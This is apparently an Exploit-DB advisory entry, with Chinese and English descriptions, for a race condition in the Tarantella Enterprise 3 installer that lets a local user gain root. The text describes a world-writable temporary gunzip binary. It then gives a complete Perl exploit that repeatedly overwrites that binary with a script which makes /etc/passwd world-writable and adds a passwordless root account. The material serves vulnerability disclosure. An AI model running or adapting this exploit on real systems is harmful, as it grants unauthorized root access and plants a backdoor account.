https://www.exploit-db.com/exploits/21244
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200205-031

TarantellaEnterprise3是一个基于Web的集中化的IT应用环境控制软件。TarantellaEnterprise在安装过程中存在竞争条件问题，可以使本地攻击者得到主机的root权限。在安装过程中，程序会在$TMPDIR环境变量指定的临时文件目录(通常是/tmp)中创建一个二进制的gunzip文件，此文件的文件名一般是gunzip$$，$$代表了进程号，安装程序会以root身份在以后的安装过程中用到这个gunzip程序。这个gunzip程序在被创建时是全局可读写的，如果能在它被使用之前以其他的可执行程序替换之，则可能以root身份执行任意命令。此漏洞只有软件安装时才可能被利用。

source: http://www.securityfocus.com/bid/3966/info

Tarantella Enterprise 3 is vulnerable to a race condition during the installation process. During installation, a root owned binary is created in /tmp (the directory specified by the $TMPDIR environment variable) with the name gunzip#### where #### is a PID. Prior to it being invoked by the installation program it can be overwritten by a local user. This is then run by the installation program with root privileges.

An attacker can only gain privileges in this manner if a privileged user is installing the software.

#!/usr/bin/perl -w
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar [email protected] 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#http://online.securityfocus.com/bid/3966
#Experimental ext3 kernel mods for preventing/researching race conditions.
#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

use strict;

`cat  <<  -EOF- > root.sh
#!/bin/sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
-EOF-`;

my $OUT = '';

while(!$OUT) {
	$OUT =  `ps -ax |grep gunzip |grep -v grep`;
        print "Found $OUTn";
}

my @args  = split(' ',$OUT);
# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
while(1) {
`cp root.sh $args[4]`;
}

来源:www.tarantella.com
链接:http://www.tarantella.com/security/bulletin-04.html
来源:XF
名称:tarantella-gunzip-tmp-race(7996)
链接:http://www.iss.net/security_center/static/7996.php
来源:BUGTRAQ
名称:20020404ExploitforTarantellaEnterprise3installation(BID3966)
链接:http://online.securityfocus.com/archive/1/265845
来源:BUGTRAQ
名称:20020126VulnerabilityreportforTarantellaEnterprise3.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101208650722179&w;=2
来源:BID
名称:3966
链接:http://www.securityfocus.com/bid/3966